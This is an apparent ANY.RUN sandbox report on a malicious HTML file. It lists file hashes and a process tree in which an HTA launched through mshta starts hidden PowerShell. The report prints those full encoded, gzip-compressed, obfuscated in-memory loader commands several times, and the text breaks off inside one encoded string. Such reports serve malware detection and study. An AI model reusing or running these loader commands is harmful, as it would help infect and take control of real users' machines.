download: | index.html |
Full analysis: | https://app.any.run/tasks/0ee9093d-57d7-47cd-a4e7-d54ba2ae799a |
Verdict: | Malicious activity |
Threats: | Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. |
Analysis date: | August 12, 2022, 23:00:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/html |
File info: | HTML document, UTF-8 Unicode text, with very long lines |
MD5: | E24D1F9BF77B2A08253902E59D701E7E |
SHA1: | CBF379526A63C12340E22AE85614D98303BE6E77 |
SHA256: | 6CFC48E0A99357140203195DCEA702DDAA3D88DBF8F5321F174784A939D688F0 |
SSDEEP: | 768:BOcoF2YXCb2x/VI7uK1WbYTJlBnBfew7k6uLV5ppppppppppppppppppLlh6C:BOZF2EH/+fWbYT/Bhew7BmV5pppppppN |
.html | | | HyperText Markup Language (100) |
---|
Title: | - |
---|
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2984 | "C:\Program Files\Internet Explorer\iexplore.exe" "C:\Users\admin\Desktop\index.html" | C:\Program Files\Internet Explorer\iexplore.exe | Explorer.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
3132 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2984 CREDAT:144385 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
4036 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2984 CREDAT:333057 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
3596 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Policy.hta" | C:\Windows\System32\mshta.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
2128 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwB7ADIAfQA0AHMASQBBAE8AWgBjADkAbQBJAEMAQQA3AFYAVwArADIAKwBxAFMAQgAnACcAKwAnACcAVAArAC8AUwBiADMAZgB5AEEAMwBKAGsAQgBpAFIAYQAzAGIAVgAzAEsAVABCAFIAOABWAEsANgAyAFcAZwBsAFcAdgAyAFUAeABoAGsAewAxAH0ARwBCAHMAVABEADQAdQBuAHYALwA5AHoAMABnADkATABHADMAMwBlADEAdQBjAGkAYwB4AHcAcwB4ADUAegBYAGUAKwBjAHcANQBlAEUAagBxAGMAcwBGACcAJwArACcAJwBEAFkATAA0AFQAdgBuAHoAOABKACsAUgBxAGcAQwBBAFcAQwBWAE0ATABuAHYAYgBKAFEASQBqAGUAbgAvAGsANQArAFAAaQAwADUALwBlAEEAKwBGAEwANABLADAAbABSAGQAcgBWAG8AcwBRAEMAUwBjAFgAVgB3ADAAawB5AGoAQwBJAFQAKwA4AFYAeQA0AHgAVgArAE0AWQBCAHcAKwBVADQARgBpAFMAaABUACsARgBrAFkAOABqAGYAewAyAH0AVAB6AHMATQBBAE8ARgA3ADQATABwAFQAOABxAGwANQBRADkASQBKACcAJwArACcAJwBxAEwANwBaAHIASQA4AGIARgB3AHAASQBaAHUAZQB0AFoAbgBEAGsAbwBqAHEANQBnAHIAUwByAGcAawBmAHYAcwBtAHkAdABPAGoAMgBxAHoAUwBmAGsAdwBRAGoAUwBYAFIAMwBNAFUAYwBCAHgAVwBYAFUAbABFAFcAZgBzAGkAcAB3ADcAdgBkAEMAawB1AGkAUQBaAHkASQB4AGMAegBqAGwAUgBFAEoAagArAHMAVgBLADQAeQBSAGgANgAvAEIAMgBoAG8AYgBtAFAAdgBNAGoAVQBXADQAegBmAHsAMQB9ADkASQBzAHkAVABLAE0AeQB2AGwAZABvADUAUwBFAGsAaQBQAEEANABpADUAcQBpAHUARwArAEUANABGAHMAJwAnACsAJwAnAHYAQwB7ADEAfQBQAFUAdwBuAGMAMQArAGwANgBhADUAKwA5AHMAawA1AEMAVABBAEYAVAAzAGsATwBHAEkAcgBFADAAZAByADQAdQBDADQAMABrAFcAaABTAC8ARQB0ACcAJwArACcAJwA5AG0AYQBnAFoAZgBLAEkAaABQAE8AWgBMAEkAUABZAG0AaQAyAHgAVgBBAG8AVABTAHMAdgBDAGYAegBFACcAJwArACcAJwBqAFgAZQB7ADEAfQB7ADEAfQBBAGQANQB7ADIAfQBsAGEAUwBYAFMAaQBBADEANABKAEYAYwBoAHIAUwArAGQAVgBHAEQAdQBRAG4ARgBCADEAWAB4AGoAVQBoAFQATABzAGkAdwBuAHYAZwBBAEUAUAA1AEkAVQBmAFEAJwAnACsAJwAnAEsAQwBxAEcAegAnACcAKwAnACcAMABmAEEAewAxAH0ARQBqADEAdgBGAEcAdQBhAG4AVwBBAEkAVwBoAHEAdwBtAEcAVABLAFgANABWAHEAVwBUAEQAQQBPACsASQBzADIAcwBGAHIANgBTADUASwBzAEQAeAA3AGcAaAB6AFMAUQA4AHMAZgB0AFYAVQByAEYARQBFAHQAdABtAEIAagBhAGoAUABpAHoAcAA3AFYAWAArAFcALwB0AEYAdQBpAGQAUwByADAAUABwAHQAYgAyAEMATQBoAGIAdQAxAEMARgBCAEMAbgBJAEsAegAwACcAJwArACcAJwBWAGsANgB3AFIAMwBHAEcAUgA2AFUAUQB1ADQAYgA0AEoARABFAC8AdwBHADQATABVAHoAeAB7ADIAfQBQAEEAVQA1AHAAYwBaAFAAYQB1ADIAQQA4AEMAZABkAEwAUwB7ADIAfQBVAHgAWgB7ADIAfQBxAFEARgA1AGoAaQBBAHAAUwBMAHIAOABPADUAcABBADMAUwBkAFIARABBAHcAYwBBADMAZQBFAGQAdQBGAHIAeQBvAEUAeAB3AEkAJwAnACsAJwAnAFoAMgBYAHgAcQA3AHcAbgByADYARABrAHsAMQAnACcAKwAnACcAfQBpAGsASwBJADcATAB3AGkAQwBCAE8AbgBYAEsAZwBvAGsAUgB4AFcANQBaAFUATQBPAFkANQBFAGQAcQB3AGwAbgAyAEsARAA2AHsAMgB9AGEAeQBTAFUARQB3AGYARgB2AEQAQQAzAGsALwA4AEcAWgArADYAMgB5AGMASwBZAFIANABrAEQAUwBRAFUASQA3AHMAdwBWAGQAZwBpAGkASwBTAEoAbABvAFUAdABjAHIATwAxAE0ATQBpAC8AYwBpADIALwBpADAAVQBTAFUAUQB2AFcAQQAnACcAKwAnACcAcABUAFgAawBBADMAWgBTAHsAMgB9AEUAeQBlAFUAaQBXAEMAUwBJAEUAVwBjAHMAWABFAFgAQQA5AFcARgBBAGMAZwBrAFgAVwB7ADEAfQBEAGsAVgB6ADYAQgBGADUAaABXAFQATQBRAG4AUABzAGkAdQArAEUAVwBkAFQAQgBnAGYAUQBwAEwAZwBVAGcATAA0AEsARQBaAEoAdQBVADgAYgBKAGcAawA0AGgARABEADAAbwB4AGoAcQAzAC8ARQBjAHsAMgB9AFAAbgBTAGMATABwAFIAbgBoAFAARABGAFMAVQBWAHQAVABiAGMAZABUADgAcABmAHcASgB7ADIAfQA2ADgAUwB5AG0AYQA0ADUATwBoAEUAWABGAEEAbwBoAE8AeABRAEUATQB4AFAAbQBrAGMAdQBvACcAJwArACcAJwB6ADAAUgBiAGsAaABUAFIAWABXAFcAQQArAHAANABXAGgATABVAGwATQAzAHAASwBZAGIAOABMAFAASQBzAGMANQBhAHAAKwA1AFYAYgA5AEYAVgBvAHQAYgBXADkAMQBRADkAMQBvADMAdQBvAEQAWABzAGQAaAB2AHIAbgBtAGsAMwB1AHsAMQB9AG4AVwArAGQAVgBBADUAMABiADcAZgByAEUAdwAxAGUANgB0AHsAMQB9AGUAWQBUAFgAZQAzAGUAawBlAHAAeQAzAHsAMQB9AGkAdgBlAG0AUgB2ADkAbABWADMAdgBGAFYATwA5AHQAcAArAFUAOQBXADIAKwA4AFgAYwA5AGMAWQB0AHoANQB1AGYAZQB1AFoAdAA3AGIAYwBPADYAWQArAGEAUQA2ADEAYQBSAC8AMQBXAE8AKwBtAFAAdABJADEAVwBiAGMAUgB0AHMAdQBrAE8AaQBUAFYAYwA5AGoAcgA4AFkAVwB4AFQAWgB7ADIAfQBuAEsALwBMADUAMgBqAHMAaQAyAHsAMgB9AHkAMwBzAEcAagBQADIAdQBxAHAAZQArAHMAZgBPAHYAdQBmAFoAbAA3ADcAaAA3AHMAWgBkADUAWAB6AFUAVwBLAHAAdABWAFcAMgBHAGIAYgB1AGoAcwBhAHUAeABGAHEAawBEAHgAYgBZADYAMgB0AEIAcQBhADgATQBoADcASgAzAE0ARgBhADgAQgBlADcAVABPAE8AcQBqAHAAYgA4ACsAVQBhADYAYgBPAFYAZABYAFMAdwB3AEQANQAyAHMAaQB1AGsAOABuAHEALwB0AFkAewAyAH0AVwB4ADAASQB3AFYAQwBxAEQAZAAzAEYAVwAzAGIAVwB7ADIAfQB4AEYANwByAGQAagBvACcAJwArACcAJwA4AHAAcABQADEARwBhAHYAVQBYAFAAdgA3AFgAMgAzAGoAdgB6AGUAeABFADcANgA1ADUAUABZAGIAZgBkAGEARwAwADAAZAAxADkAbwA5AHIAWABXAHAAdABtADgAdABxAHoATQBaADIAYwB2AEoANgBJADUATwBSAGwAWgB0AHcAcgBDAHoAVQBYAHkAdwBRAGIAQgAyAFkAeQA4AGYARgBPAHsAMQB9AHkAcgB2AHYAYgAyAGgAeAA4AG4AVwBiADIAQQB4AEwAUQBoADcAcQByAG4ARgB0AG4AVwByAGkANQBtAGcALwBXAGMAMwBjADQATwByADMAZABYAHUAOABlADYAawB5ADEARgBNAFgAKwBBAHQAbQBlAFcAaQBUAGsAeAAvAFYAWgBhAGEAdQBsAHIAZgBEAHoAcAA5AEkAaQBlAHAAewAyAH0AdQA5AHoAcQA5AGcAYQBMAFkAUgB4AFIAbwBBAEIAMgA4ACcAJwArACcAJwBxAE0AVQBPACcAJwArACcAJwBpAHoAcAA1AFQAeAAnACcAKwAnACcANAB3AGsAbQBwAEkARQBvAHoAMwBKAFkANQBDAFQARwBFAGUAdwBzAFEAcwBLAEsAeABTAHkAcAB4ADAASgBHAFMAOQBHADgAYgBSAFkAVQBpAGsATQB3AHYAUQBTAHcAewAxAH0ANgA2ADAAawBXAG4AZwBUAGwANQAwAGwAUgBiAEYAMQBjAFQAQwAnACcAKwAnACcAQgBHAEsASQB1AE0AcwA1AFUAKwBEAHUAZgBjAEwAMQBlADMAeAA5AFUAcQB0AFAAagBxAHQAdAByAEkAUwB1AEQAagBWACcAJwArACcAJwAyAHUAeQAxAFUANAA2AFcAQwB1AG4AVQB3AEsAZwBlAGIASgBPAE0AKwB0AGcAawB7ADIAfQBpAEMASgBQADEAcQB1AE8AQgBqAGcARQB7ADEAfQBYAGUAaAArAHcAOQA3AEEARAB6ADAAdABvAEkAOQBEAFYARAB1AFcAZABJAHEAZwB4AFIAbAAvAGkAbAAxADMAcgBpAFEAZQB2AHcAQQBQAFUAYQBuAEQAeABhAGYAbwBkAEEAQQB3AEIAOQBTAFAAOABLAEoAUgA0AE8AaQBGAGYAVAB0AHoAUwA0ADgAbgBKAHkAYQArAGsAVABkADYAaQBmAFAAaAB6AC8ANAAwADIAegAzAHYALwBjAFAAbwBoAEsAbABYAEwASwBUAFkALwBiAGIANwBlAGUAewAxAH0AewAyAH0AWgBmADkAbgAxAFIANABoAHcAawBEAE8AaAB6AFYASgA4AG0AUAB0AHYAbwA1AEQAWAB5AFkAdgBrAHAAcABtAEIASQB2AEQAeQBsAFgANABQADMAeQBUADgANgBCAHEAKwByAHIASgBlAC8AeABlADQAaAB6AEUAYQBpAFEAcwBBAEEAQQB7ADAAfQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnAE4AJwAnACwAJwAnAEgAJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
888 | "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('{2}4sIAOZc9mICA7VW+2+qSB'+'T+/Sb3fyA3JkBiRa3bV3KTBR8VK62WglWv2Uxhk{1}GBsTD4unv/9z0g9LG33e1ucicxwsx5zXe+cw5eEjqcsF'+'DYL4Tvnz8J+RqgCAWCVMLnvbJQIjen/k5+Pi05/eA+FL4K0lRdrVosQCScXVw0kyjCIT+8Vy4xV+MYBw+U4FiShT+FkY8jf{2}TzsMAOF74LpT8ql5Q9IJ'+'qL7ZrI8bFwpIZuetZnDkojq5grSrgkfvsmytOj2qzSfkwQjSXR3MUcBxWXUlEWfsipw7vdCkuiQZyIxczjlREJj+sVK4yRh6/B2hobmPvMjUW4zf{1}9IsyTKMyvldo5SEkiPA4i5qiuG+E4Fs'+'vC{1}PUwnc1+l6a5+9sk5CTAFT3kOGIrE0dr4uC40kWhS/Et'+'9magZfKIhPOZLIPYmi2xVAoTSsvCfzE'+'jXe{1}{1}Ad5{2}laSXSiA14JFchrS+dVGDuQnFB1XxjUhTLsiwnvgAEP5IUfQ'+'KCqGz'+'0fA{1}Ej1vFGuanWAIWhqwmGTKX4VqWTDAO+Is2sFr6S5KsDx7ghzSQ8sftVUrFEEttmBjajPizp7VX+W/tFuidSr0Pptb2CMhbu1CFBCnIKz0'+'Vk6wR3GGR6UQu4b4JDE/wG4LUzx{2}PAU5pcZPau2A8CddLS{2}UxZ{2}qQF5jiApSLr8O5pA3SdRDAwcA3eEduFryoExwI'+'Z2Xxq7wnr6Dk{1'+'}ikKI7LwiCBOnXKgokRxW5ZUMOY5Edqwln2KD6{2}aySUEwfFvDA3k/8GZ+62ycKYR4kDSQUI7swVdgiiKSJloUtcrO1MMi/ci2/i0USUQvWA'+'pTXkA3ZS{2}EyeUiWCSIEWcsXEXA9WFAcgkXW{1}DkVz6BF5hWTMQnPsiu+EWdTBgfQpLgUgL4KEZJuU8bJgk4hDD0oxjq3/Ec{2}PnScLpRnhPDFSUVtTbcdT8pfwJ{2}68Syma45OhEXFAohOxQEMxPmkcuo'+'z0RbkhTRXWWA+p4WhLUlM3pKYb8LPIsc5ap+5Vb9FVotbW91Q91o3uoDXsdhvrnmk3u{1}nW+dVA50b7frEw1e6t{1}eYTXe3ekepy3{1}ivemRv9lV3vFVO9tp+U9W2+8Xc9cYtz5ufeuZt7bcO6Y+aQ61aR/1WO+mPtI1WbcRtsukOiTVc9jr8YWxTZ{2}nK/L52jsi2{2}y3sGjP2uqpe+sfOvufZl77h7sZd5XzUWKptVW2GbbujsauxFqkDxbY62tBqa8Mh7J3MFa8Be7TOOqjpb8+Ua6bOVdXSwwD52siuk8nq/tY{2}Wx0IwVCqDd3FW3bW{2}xF7rdjo'+'8ppP1GavUXPv7X23jvzexE7655PYbfdaG00d19o9rXWptm8tqzMZ2cvJ6I5ORlZtwrCzUXywQbB2Yy8fFO{1}yrvvb2hx8nWb2AxLQh7qrnFtnWri5mg/Wc3c4Or3dXu8e6ky1FMX+AtmeWiTkx/VZaaulrfDzp9Iiep{2}u9zq9gaLYRxRoAB28'+'qMUO'+'izp5Tx'+'4wkmpIEoz3JY5CTGEewsQsKKxSypx0JGS9G8bRYUikMwvQSw{1}660kWngTl50lRbF1cTC'+'BGKIuMs5U+DufcL1e3x9UqtPjqttrISuDjV'+'2uy1U46WCunUwKgebJOM+tgk{2}iCJP1quOBjgE{1}Xeh+w97ADz0toI9DVDuWdIqgxRl/il13riQevwAPUanDxafodAAwB9SP8KJR4OiFfTtzS48nJya+kTd6ifPhz/402z3v/cPohKlXLKTY/bb7ee{1}{2}Zf9n1R4hwkDOhzVJ8mPtvo5DXyYvkppmBIvDylX4P3yT86Bq+rrJe/xe4hzEaiQsAAA{0}{0}')-f'=','N','H')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3072 | cmd | C:\Windows\system32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3284 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\Policy.hta" | C:\Windows\System32\mshta.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
2548 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwB7ADIAfQA0AHMASQBBAE8AWgBjADkAbQBJAEMAQQA3AFYAVwArADIAKwBxAFMAQgAnACcAKwAnACcAVAArAC8AUwBiADMAZgB5AEEAMwBKAGsAQgBpAFIAYQAzAGIAVgAzAEsAVABCAFIAOABWAEsANgAyAFcAZwBsAFcAdgAyAFUAeABoAGsAewAxAH0ARwBCAHMAVABEADQAdQBuAHYALwA5AHoAMABnADkATABHADMAMwBlADEAdQBjAGkAYwB4AHcAcwB4ADUAegBYAGUAKwBjAHcANQBlAEUAagBxAGMAcwBGACcAJwArACcAJwBEAFkATAA0AFQAdgBuAHoAOABKACsAUgBxAGcAQwBBAFcAQwBWAE0ATABuAHYAYgBKAFEASQBqAGUAbgAvAGsANQArAFAAaQAwADUALwBlAEEAKwBGAEwANABLADAAbABSAGQAcgBWAG8AcwBRAEMAUwBjAFgAVgB3ADAAawB5AGoAQwBJAFQAKwA4AFYAeQA0AHgAVgArAE0AWQBCAHcAKwBVADQARgBpAFMAaABUACsARgBrAFkAOABqAGYAewAyAH0AVAB6AHMATQBBAE8ARgA3ADQATABwAFQAOABxAGwANQBRADkASQBKACcAJwArACcAJwBxAEwANwBaAHIASQA4AGIARgB3AHAASQBaAHUAZQB0AFoAbgBEAGsAbwBqAHEANQBnAHIAUwByAGcAawBmAHYAcwBtAHkAdABPAGoAMgBxAHoAUwBmAGsAdwBRAGoAUwBYAFIAMwBNAFUAYwBCAHgAVwBYAFUAbABFAFcAZgBzAGkAcAB3ADcAdgBkAEMAawB1AGkAUQBaAHkASQB4AGMAegBqAGwAUgBFAEoAagArAHMAVgBLADQAeQBSAGgANgAvAEIAMgBoAG8AYgBtAFAAdgBNAGoAVQBXADQAegBmAHsAMQB9ADkASQBzAHkAVABLAE0AeQB2AGwAZABvADUAUwBFAGsAaQBQAEEANABpADUAcQBpAHUARwArAEUANABGAHMAJwAnACsAJwAnAHYAQwB7ADEAfQBQAFUAdwBuAGMAMQArAGwANgBhADUAKwA5AHMAawA1AEMAVABBAEYAVAAzAGsATwBHAEkAcgBFADAAZAByADQAdQBDADQAMABrAFcAaABTAC8ARQB0ACcAJwArACcAJwA5AG0AYQBnAFoAZgBLAEkAaABQAE8AWgBMAEkAUABZAG0AaQAyAHgAVgBBAG8AVABTAHMAdgBDAGYAegBFACcAJwArACcAJwBqAFgAZQB7ADEAfQB7ADEAfQBBAGQANQB7ADIAfQBsAGEAUwBYAFMAaQBBADEANABKAEYAYwBoAHIAUwArAGQAVgBHAEQAdQBRAG4ARgBCADEAWAB4AGoAVQBoAFQATABzAGkAdwBuAHYAZwBBAEUAUAA1AEkAVQBmAFEAJwAnACsAJwAnAEsAQwBxAEcAegAnACcAKwAnACcAMABmAEEAewAxAH0ARQBqADEAdgBGAEcAdQBhAG4AVwBBAEkAVwBoAHEAdwBtAEcAVABLAFgANABWAHEAVwBUAEQAQQBPACsASQBzADIAcwBGAHIANgBTADUASwBzAEQAeAA3AGcAaAB6AFMAUQA4AHMAZgB0AFYAVQByAEYARQBFAHQAdABtAEIAagBhAGoAUABpAHoAcAA3AFYAWAArAFcALwB0AEYAdQBpAGQAUwByADAAUABwAHQAYgAyAEMATQBoAGIAdQAxAEMARgBCAEMAbgBJAEsAegAwACcAJwArACcAJwBWAGsANgB3AFIAMwBHAEcAUgA2AFUAUQB1ADQAYgA0AEoARABFAC8AdwBHADQATABVAHoAeAB7ADIAfQBQAEEAVQA1AHAAYwBaAFAAYQB1ADIAQQA4AEMAZABkAEwAUwB7ADIAfQBVAHgAWgB7ADIAfQBxAFEARgA1AGoAaQBBAHAAUwBMAHIAOABPADUAcABBADMAUwBkAFIARABBAHcAYwBBADMAZQBFAGQAdQBGAHIAeQBvAEUAeAB3AEkAJwAnACsAJwAnAFoAMgBYAHgAcQA3AHcAbgByADYARABrAHsAMQAnACcAKwAnACcAfQBpAGsASwBJADcATAB3AGkAQwBCAE8AbgBYAEsAZwBvAGsAUgB4AFcANQBaAFUATQBPAFkANQBFAGQAcQB3AGwAbgAyAEsARAA2AHsAMgB9AGEAeQBTAFUARQB3AGYARgB2AEQAQQAzAGsALwA4AEcAWgArADYAMgB5AGMASwBZAFIANABrAEQAUwBRAFUASQA3AHMAdwBWAGQAZwBpAGkASwBTAEoAbABvAFUAdABjAHIATwAxAE0ATQBpAC8AYwBpADIALwBpADAAVQBTAFUAUQB2AFcAQQAnACcAKwAnACcAcABUAFgAawBBADMAWgBTAHsAMgB9AEUAeQBlAFUAaQBXAEMAUwBJAEUAVwBjAHMAWABFAFgAQQA5AFcARgBBAGMAZwBrAFgAVwB7ADEAfQBEAGsAVgB6ADYAQgBGADUAaABXAFQATQBRAG4AUABzAGkAdQArAEUAVwBkAFQAQgBnAGYAUQBwAEwAZwBVAGcATAA0AEsARQBaAEoAdQBVADgAYgBKAGcAawA0AGgARABEADAAbwB4AGoAcQAzAC8ARQBjAHsAMgB9AFAAbgBTAGMATABwAFIAbgBoAFAARABGAFMAVQBWAHQAVABiAGMAZABUADgAcABmAHcASgB7ADIAfQA2ADgAUwB5AG0AYQA0ADUATwBoAEUAWABGAEEAbwBoAE8AeABRAEUATQB4AFAAbQBrAGMAdQBvACcAJwArACcAJwB6ADAAUgBiAGsAaABUAFIAWABXAFcAQQArAHAANABXAGgATABVAGwATQAzAHAASwBZAGIAOABMAFAASQBzAGMANQBhAHAAKwA1AFYAYgA5AEYAVgBvAHQAYgBXADkAMQBRADkAMQBvADMAdQBvAEQAWABzAGQAaAB2AHIAbgBtAGsAMwB1AHsAMQB9AG4AVwArAGQAVgBBADUAMABiADcAZgByAEUAdwAxAGUANgB0AHsAMQB9AGUAWQBUAFgAZQAzAGUAawBlAHAAeQAzAHsAMQB9AGkAdgBlAG0AUgB2ADkAbABWADMAdgBGAFYATwA5AHQAcAArAFUAOQBXADIAKwA4AFgAYwA5AGMAWQB0AHoANQB1AGYAZQB1AFoAdAA3AGIAYwBPADYAWQArAGEAUQA2ADEAYQBSAC8AMQBXAE8AKwBtAFAAdABJADEAVwBiAGMAUgB0AHMAdQBrAE8AaQBUAFYAYwA5AGoAcgA4AFkAVwB4AFQAWgB7ADIAfQBuAEsALwBMADUAMgBqAHMAaQAyAHsAMgB9AHkAMwBzAEcAagBQADIAdQBxAHAAZQArAHMAZgBPAHYAdQBmAFoAbAA3ADcAaAA3AHMAWgBkADUAWAB6AFUAVwBLAHAAdABWAFcAMgBHAGIAYgB1AGoAcwBhAHUAeABGAHEAawBEAHgAYgBZADYAMgB0AEIAcQBhADgATQBoADcASgAzAE0ARgBhADgAQgBlADcAVABPAE8AcQBqAHAAYgA4ACsAVQBhADYAYgBPAFYAZABYAFMAdwB3AEQANQAyAHMAaQB1AGsAOABuAHEALwB0AFkAewAyAH0AVwB4ADAASQB3AFYAQwBxAEQAZAAzAE